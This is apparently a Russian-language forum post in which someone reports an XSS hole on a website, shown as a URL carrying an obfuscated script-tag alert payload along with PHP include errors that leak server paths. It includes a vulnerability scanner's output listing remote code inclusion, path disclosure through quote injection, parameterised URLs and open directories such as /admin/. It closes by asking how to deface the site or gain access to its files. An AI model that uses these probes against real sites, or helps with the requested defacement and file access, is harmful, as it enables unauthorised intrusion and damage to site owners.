Нашел уязвимость. Выполняется JavaScript:

http://www.site.com:443/interesting/index.php?pg=<Sсгiрt>а1егt()</Sсгiрt>

Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39

Warning: main(): Failed opening '../interesting/info/<Sсгiрt>а1егt()</Sсгiрt>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39



Потом просканил. Вот что мне выдал:

1) Серьезная уязвимость
Выполнение кода, взятого с удаленного сервера

Описание

Уязвимость "Code Injection" с помощью запроса:
http://www.site.com:443/interesting/...tp://wwwwwwww/
позволяет атакующему выполнять произвольный код, взятый с удаленного сервера.

2) Уязвимость
Реальный путь к серверу

Описание

Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/interesting/...tp://wwwwwwww/

Описание

Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/disks/index.php?pg=1'

Описание

Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/audio/index.php?pg=1'

3) Доступна информация
Ссылки с параметрами
Описание

Список ссылок найденных на веб-сервере, которые используют какие-либо параметры:

/interesting/index.php?pg=multios

/archive/index.php?pg=010402

/disks/index.php?pg=SeaMed

/audio/index.php?pg=Aopen

4) Доступна информация
Доступ к директориям
Описание

Доступные директории:
/admin/
/communications/
/proccesors/
/boards/
/video/
/disks/
/audio/
/security/
/interesting/
/archive/

5) Недоступные директории
Описание

Cуществующие, но недоступные директории:
/cgi-bin/
/forum/
/mp3/
/search/
/tmp/
/includes/
/img/


Помогите пожалуйста, каким образом можно добиться дефейса или же получить доступ к файлам?